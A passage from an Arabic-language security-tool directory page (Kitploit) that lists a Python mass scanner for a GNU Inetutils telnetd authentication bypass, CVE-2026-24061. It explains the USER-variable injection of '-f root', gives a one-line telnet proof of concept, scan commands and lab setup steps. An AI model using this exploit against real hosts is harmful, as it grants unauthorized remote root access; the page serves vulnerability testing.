Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — ماسح ضوئي مبني على Python يكتشف ثغرة CVE-2026-24061 في GNU Inetutils telnetd، مما يتيح الاختبار الدفعي لأهداف متعددة للتحقق من ثغرة تجاوز المصادقة. | Kitploit
أدوات/GitHubGitHub/monstertsl/cve-2026-24061
ماسحات الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقةأداة الوصول عن بعد
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

ماسح ضوئي مبني على Python يكتشف ثغرة CVE-2026-24061 في GNU Inetutils telnetd، مما يتيح الاختبار الدفعي لأهداف متعددة للتحقق من ثغرة تجاوز المصادقة.

عرض المستودع
14منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة الفحص الجماعي لثغرة CVE-2026-24061

⚠️ ملاحظة: CVE-2026-24061 GNU Inetutils هي مجموعة أدوات شبكات كلاسيكية مقدمة من مشروع GNU، وتتضمن خدمة telnetd، أي البرنامج الخفي لخادم Telnet. في الإصدارات من 1.9.3 إلى 2.7، توجد عيوب قاتلة في عملية مصادقة المستخدم لخدمة telnetd. عند استدعاء برنامج تسجيل الدخول النظامي /usr/bin/login، تفشل الخدمة في تصفية والتحقق من متغير البيئة USER المرسل من العميل بشكل فعال. يمكن للمهاجم حقن معامل -f مباشرة في أمر login عن طريق تعيين قيمة محددة لمتغير USER. يُستخدم معامل -f في برنامج login لتخطي المصادقة الثانوية، مما يسمح للمهاجم بتجاوز جميع خطوات التحقق من كلمة المرور تمامًا، وإنشاء جلسة عن بُعد مباشرة كمستخدم root، وبالتالي الحصول على أعلى صلاحيات التحكم في الخادم. هذه الثغرة شديدة الخطورة، وتعادل بابًا خلفيًا مفتوحًا لجذر النظام عن بُعد دون الحاجة إلى أي بيانات اعتماد.

كود إثبات الثغرة (POC)

root@kitploit:~
USER='-f root' telnet -a <target_ip>

سكربت الفحص

demo.png

فحص فردي

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

فحص جماعي

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

مبدأ الثغرة

يقوم الأمر أعلاه بتعيين متغير البيئة USER إلى -f root. عندما تستقبل خدمة telnetd المعرضة للثغرة الاتصال، فإنها تنشئ وتنفذ استدعاء نظام مشابه لما يلي:

خطوات إعادة الإنتاج

1. تثبيت البرامج اللازمة

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. إلغاء تعليق سطر telnet (تأكد من صحة التنسيق)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. إعادة تشغيل الخدمة

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. فحص المنفذ

root@kitploit:~
sudo ss -tuln | grep ':23'

5. اختبار محلي

root@kitploit:~
telnet localhost 23
تنزيل الأداة